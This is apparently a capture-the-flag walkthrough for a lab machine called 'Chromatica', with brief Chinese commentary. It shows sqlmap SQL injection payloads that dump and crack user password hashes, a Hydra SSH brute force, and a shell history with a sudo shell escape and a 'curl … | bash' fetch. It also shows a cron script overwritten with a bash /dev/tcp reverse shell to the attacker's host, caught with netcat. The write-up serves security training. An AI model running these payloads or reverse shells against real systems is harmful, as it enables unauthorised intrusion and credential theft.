┌──(root㉿kali)-[/home/kali/baji/Chromatica] └─# nmap -Pn -n -sV -sC 192.168.56.15 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 21:54 EST Nmap scan report for 192.168.56.15 Host is up (0.00066s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 7c:94:7f:cb:4a:d5:8b:9f:9e:ff:7b:7a:59:ff:75:b5 (ECDSA) |_ 256 ed:94:2a:fc:30:30:cc:07:ae:27:7d:ca:92:01:49:31 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Chromatica|Coming Soon..... MAC Address: 08:00:27:67:0D:85 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.91 seconds
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:05:27 /2024-11-09/
[22:05:27] [INFO] resuming back-end DBMS 'mysql' [22:05:27] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: city (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: city=1' OR NOT 7686=7686-- XUIb
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: city=1' AND (SELECT 6459 FROM (SELECT(SLEEP(5)))lTOD)-- bGSk --- [22:05:27] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 22.04 (jammy) web application technology: Apache 2.4.52 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [22:05:27] [INFO] fetching database names [22:05:27] [INFO] fetching number of databases [22:05:27] [INFO] resumed: 2 [22:05:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [22:05:27] [INFO] retrieved: information_schema [22:05:28] [INFO] retrieved: Chromatica available databases [2]: [*] Chromatica [*] information_schema
[22:05:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.15'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:06:10 /2024-11-09/
[22:06:10] [INFO] resuming back-end DBMS 'mysql' [22:06:10] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: city (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: city=1' OR NOT 7686=7686-- XUIb
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: city=1' AND (SELECT 6459 FROM (SELECT(SLEEP(5)))lTOD)-- bGSk --- [22:06:11] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 22.04 (jammy) web application technology: Apache 2.4.52 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [22:06:11] [INFO] fetching tables for database: 'Chromatica' [22:06:11] [INFO] fetching number of tables for database 'Chromatica' [22:06:11] [INFO] resumed: 2 [22:06:11] [INFO] resumed: users [22:06:11] [INFO] resumed: cities [22:06:11] [INFO] fetching columns for table 'cities' in database 'Chromatica' [22:06:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [22:06:11] [INFO] retrieved: 4 [22:06:11] [INFO] retrieved: id [22:06:11] [INFO] retrieved: city [22:06:11] [INFO] retrieved: population [22:06:11] [INFO] retrieved: postal_code [22:06:12] [INFO] fetching entries for table 'cities' in database 'Chromatica' [22:06:12] [INFO] fetching number of entries for table 'cities' in database 'Chromatica' [22:06:12] [INFO] retrieved: 11 [22:06:12] [INFO] retrieved: New York City [22:06:12] [INFO] retrieved: 1 [22:06:12] [INFO] retrieved: 8336817 [22:06:13] [INFO] retrieved: 10001 [22:06:13] [INFO] retrieved: Los Angeles [22:06:13] [INFO] retrieved: 2 [22:06:14] [INFO] retrieved: 3979576 [22:06:14] [INFO] retrieved: 90001 [22:06:14] [INFO] retrieved: Chicago [22:06:14] [INFO] retrieved: 3 [22:06:14] [INFO] retrieved: 2693976 [22:06:15] [INFO] retrieved: 60601 [22:06:15] [INFO] retrieved: Houston [22:06:15] [INFO] retrieved: 4 [22:06:15] [INFO] retrieved: 2320268 [22:06:16] [INFO] retrieved: 77001 [22:06:16] [INFO] retrieved: Phoenix [22:06:16] [INFO] retrieved: 5 [22:06:16] [INFO] retrieved: 1680992 [22:06:16] [INFO] retrieved: 85001 [22:06:17] [INFO] retrieved: Philadelphia [22:06:17] [INFO] retrieved: 6 [22:06:17] [INFO] retrieved: 1584064 [22:06:17] [INFO] retrieved: 19101 [22:06:18] [INFO] retrieved: San Antonio [22:06:18] [INFO] retrieved: 7 [22:06:18] [INFO] retrieved: 1547253 [22:06:18] [INFO] retrieved: 78201 [22:06:19] [INFO] retrieved: San Diego [22:06:19] [INFO] retrieved: 8 [22:06:19] [INFO] retrieved: 1425976 [22:06:19] [INFO] retrieved: 92101 [22:06:20] [INFO] retrieved: Dallas [22:06:20] [INFO] retrieved: 9 [22:06:20] [INFO] retrieved: 1317929 [22:06:20] [INFO] retrieved: 75201 [22:06:21] [INFO] retrieved: San Jose [22:06:21] [INFO] retrieved: 10 [22:06:21] [INFO] retrieved: 1030119 [22:06:21] [INFO] retrieved: 95101 [22:06:22] [INFO] retrieved: Paris [22:06:22] [INFO] retrieved: 11 [22:06:22] [INFO] retrieved: 2140526 [22:06:22] [INFO] retrieved: 75001 Database: Chromatica Table: cities [11 entries] +----+---------------+------------+-------------+ | id | city | population | postal_code | +----+---------------+------------+-------------+ | 1 | New York City | 8336817 | 10001 | | 2 | Los Angeles | 3979576 | 90001 | | 3 | Chicago | 2693976 | 60601 | | 4 | Houston | 2320268 | 77001 | | 5 | Phoenix | 1680992 | 85001 | | 6 | Philadelphia | 1584064 | 19101 | | 7 | San Antonio | 1547253 | 78201 | | 8 | San Diego | 1425976 | 92101 | | 9 | Dallas | 1317929 | 75201 | | 10 | San Jose | 1030119 | 95101 | | 11 | Paris | 2140526 | 75001 | +----+---------------+------------+-------------+
[22:06:23] [INFO] table 'Chromatica.cities' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.15/dump/Chromatica/cities.csv' [22:06:23] [INFO] fetching columns for table 'users' in database 'Chromatica' [22:06:23] [INFO] resumed: 4 [22:06:23] [INFO] resumed: id [22:06:23] [INFO] resumed: username [22:06:23] [INFO] resumed: password [22:06:23] [INFO] resumed: description [22:06:23] [INFO] fetching entries for table 'users' in database 'Chromatica' [22:06:23] [INFO] fetching number of entries for table 'users' in database 'Chromatica' [22:06:23] [INFO] resumed: 5 [22:06:23] [INFO] resumed: admin [22:06:23] [INFO] resumed: 1 [22:06:23] [INFO] resumed: 8d06f5ae0a469178b28bbd34d1da6ef3 [22:06:23] [INFO] resumed: admin [22:06:23] [INFO] resumed: developer account for taz [22:06:23] [INFO] resumed: 2 [22:06:23] [INFO] resumed: 1ea6762d9b86b5676052d1ebd5f649d7 [22:06:23] [INFO] resumed: dev [22:06:23] [INFO] resumed: user account for testing [22:06:23] [INFO] resumed: 3 [22:06:23] [INFO] resumed: 3dd0f70a06e2900693fc4b684484ac85 [22:06:23] [INFO] resumed: user [22:06:23] [INFO] resumed: developer account for selim [22:06:23] [INFO] resumed: 4 [22:06:23] [INFO] resumed: f220c85e3ff19d043def2578888fb4e5 [22:06:23] [INFO] resumed: dev-selim [22:06:23] [INFO] resumed: intern [22:06:23] [INFO] resumed: 5 [22:06:23] [INFO] resumed: aaf7fb4d4bffb8c8002978a9c9c6ddc9 [22:06:23] [INFO] resumed: intern [22:06:23] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [22:06:23] [INFO] using hash method 'md5_generic_passwd' [22:06:23] [INFO] resuming password 'keeptrying' for hash '3dd0f70a06e2900693fc4b684484ac85' for user 'user' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [22:06:23] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [22:06:23] [INFO] starting dictionary-based cracking (md5_generic_passwd) [22:06:23] [INFO] starting 2 processes Database: Chromatica Table: users [5 entries] +----+-----------------------------------------------+-----------+-----------------------------+ | id | password | username | description | +----+-----------------------------------------------+-----------+-----------------------------+ | 1 | 8d06f5ae0a469178b28bbd34d1da6ef3 | admin | admin | | 2 | 1ea6762d9b86b5676052d1ebd5f649d7 | dev | developer account for taz | | 3 | 3dd0f70a06e2900693fc4b684484ac85 (keeptrying) | user | user account for testing | | 4 | f220c85e3ff19d043def2578888fb4e5 | dev-selim | developer account for selim | | 5 | aaf7fb4d4bffb8c8002978a9c9c6ddc9 | intern | intern | +----+-----------------------------------------------+-----------+-----------------------------+
[22:06:45] [INFO] table 'Chromatica.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.15/dump/Chromatica/users.csv' [22:06:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.15'
┌──(root㉿kali)-[/home/kali/baji/Chromatica] └─# cat /root/.local/share/sqlmap/output/192.168.56.15/dump/Chromatica/users.csv id,password,username,description 1,8d06f5ae0a469178b28bbd34d1da6ef3,admin,admin 2,1ea6762d9b86b5676052d1ebd5f649d7,dev,developer account for taz 3,3dd0f70a06e2900693fc4b684484ac85 (keeptrying),user,user account for testing 4,f220c85e3ff19d043def2578888fb4e5,dev-selim,developer account for selim 5,aaf7fb4d4bffb8c8002978a9c9c6ddc9,intern,intern
┌──(root㉿kali)-[/home/kali/baji/Chromatica] └─# hydra -L user.txt -P pass.txt 192.168.56.15 ssh Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-09 22:13:51 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries (l:6/p:11), ~5 tries per task [DATA] attacking ssh://192.168.56.15:22/ [22][ssh] host: 192.168.56.15 login: dev password: flaghere 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-09 22:14:03
获取dev::flaghere
1 2 3 4 5 6 7 8 9 10 11 12 13 14
┌──(root㉿kali)-[/home/kali/baji/Chromatica] └─# ssh dev@192.168.56.15 dev@192.168.56.15's password: GREETINGS, THIS ACCOUNT IS NOT A LOGIN ACCOUNT IF YOU WANNA DO SOME MAINTENANCE ON THIS ACCOUNT YOU HAVE TO EITHER CONTACT YOUR ADMIN OR THINK OUTSIDE THE BOX BE LAZY AND CONTACT YOUR ADMIN OR MAYBE YOU SHOULD USE YOUR HEAD MORE heh,, REGARDS
brightctf{ALM0ST_TH3R3_34897ffdf69} Connection to 192.168.56.15 closed.
dev@Chromatica:~$ cat .bash_history cd neofetch TF=$(mktemp) echo 'exec /bin/sh' > $TF sudo -l clear ll clear sudo neofetch --config $T sudo neofetch --config $TF exi exit cd sudo -l sudo -u zenitsu neofetch --config $TF echo $TF$ clear ll clear TF=$(mktemp) echo 'exec /bin/sh' > $TF sudo -u zenitsu neofetch --config $TF clear systemctl ssh systemctl status ssh clear ll clear exit clear ls pwd vim hello.txt clear ll more hello.txt vim hello.txt clear more hello.txt exit cd ll vim .bashrc exit ./linpeas.sh > security_checks/dev.log ./linpeas.sh > security_checks>dev.log ./linpeas.sh > security_checks/dev.log ll cd security_checks/ ll vim dev.log more dev.log su analyst vim .bashrc cd vim .bashrc ll cd .. ll cd taz/ ll clear cd ll ls ls ls -la clear l clear ls .ssh ll ls ls -lah mv .bashrc.bak .bashrc source .bashrc ll cd ll cd vim bye.sh clear ll more .bashrc clear ll vim /etc/ssh/ssh_config ll chmod +x bye.sh clear ll clear ll clear exit clear ll clear ll exit id cat /etc/passwd sudo -l find --help clear find --help man find find / -perm -4000 -type f -ls 2>/dev/null clear ll claer clear cat /etc/crontab clear cat /etc/crontab ll /opt/scripts/end_of_day.sh vim /opt/scripts/end_of_day.sh clear cat /etc/crontab cat /opt/scripts/end_of_day.sh exit su analyst shutdown now clear iptables -L exit clear ls cat hello.txt vim bye.sh ll quit exit clear ls ls /var/www/html/ ls ll cd /var/www/ ls ll cd html/ ms ll cd dev-portal/ ls cd assets/ ls cd .. ls cd css/ ls vim style.css sudo -l clear su - clear ll clear cat /etc/passwd clear sudo -l cler clear su analyst clear ll cat /etc/crontab vim /opt/scripts/end_of_day.sh ls ll sudo su su clear exit ll cat hello.txt ls cat /etc/passwd cat /etc/cronta cat /etc/crontab ll /opt/scripts/end_of_day.sh vim /opt/scripts/end_of_day.sh cat /opt/scripts/end_of_day.sh cler clear vim /etc/dnsmasq.cinf vim /etc/dnsmasq.conf cat /etc/hosts clear exit clear su - root exit clear ll clear ll clear clear ls cat hello.txt clear ll clear ls ll /bin/bash clear ll clearr clear ls clear ll cat /etc/crontab vim /opt/scripts/end_of_day.sh clear vim /opt/scripts/end_of_day.sh vim /opt/scripts/ clear cat /etc/crontab timedatectl clear ls l ll exit clear cat /etc/passwd clear sudo -l clear cat /etc/crontab ll /opt/scripts/end_of_day.sh vim /opt/scripts/end_of_day.sh cat /etc/dnsmasq.conf cat /etc/hosts id hostname curl 192.168.56.1/linpeas.sh|bash /opt/DVWA/vulnerabilities/csrf/test_credentials.php ls -lah cat dev.txt mv dev.txt user.txt cat user.txt cat hello.txt cls ls cat bye.sh cd /opts cd /opt clear ls ls -R clear ls -lahR ls clear ls rm linpeas.sh ls -lh cd scripts/ ls cat end_of_day.sh cd .. cd security_checks/ ls cat * cls clear ls cat analyst.log cls clearar clear cd .. cd scripts/ ls ls -lah cat end_of_day.sh echo 'bash -c "bash -i >& /dev/tcp/192.168.56.1/6666 0>&1"' >> end_of_day.sh cat end_of_day.sh vi end_of_day.sh clear upgrade exit is id /bin/bash passwd cd /root ls ls -lah cd .ssh ls cat id_ecdsa cat authorized_keys cat id_ecdsa.pub > authorized_keys id bash -p ls exit exit ls /bin/bash ls -lah /bin/bash cd /opt/ ls cd scripts/ ls cat end_of_day.sh echo '/bin/bash -i >& /dev/tcp/192.168.56.1/6666 0>&1' >> end_of_day.sh cat end_of_day.sh cls ls clear ls cat end_of_day.sh echo '/bin/bash -i >& /dev/tcp/192.168.56.1/6666 0>&1' >> end_of_day.sh cat end_of_day.sh cls clear cat end_of_day.sh echo "#this is my end of day script" > end_of_day.sh cat end_of_day.sh bash -p ls cat hello.txt cat user.txt sudo -l find / -perm -u=s -type f 2>/dev/null ls ls -al cat bye.sh cat .bash_history cat /opt/scripts/end_of_day.sh cat /etc/cron* echo "bash -i >& /dev/tcp/192.168.56.4/1234 0>&1" > /opt/scripts/end_of_day.sh ls
dev@Chromatica:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
SHELL=/bin/sh # You can also override PATH, but by default, newer versions inherit it from the environment #PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * analyst /bin/bash /opt/scripts/end_of_day.sh
确实是定时任务,进行反弹shell
1 2 3 4 5 6
dev@Chromatica:~$ cat /opt/scripts/end_of_day.sh #this is my end of day script dev@Chromatica:~$ echo "bash -i >& /dev/tcp/192.168.56.4/1234 0>&1" > /opt/scripts/end_of_day.sh dev@Chromatica:~$ cat /opt/scripts/end_of_day.sh bash -i >& /dev/tcp/192.168.56.4/1234 0>&1
等待
1 2 3 4 5 6 7 8 9 10 11 12 13 14
┌──(root㉿kali)-[/home/kali/baji/Chromatica] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.56.4] from (UNKNOWN) [192.168.56.15] 58340 bash: cannot set terminal process group (1900): Inappropriate ioctl for device bash: no job control in this shell analyst@Chromatica:~$ id id uid=1002(analyst) gid=1002(analyst) groups=1002(analyst)
analyst@Chromatica:~$ cat a cat analyst.txt brightctf{GAZETTO_RUKI_b2f4f50f398}
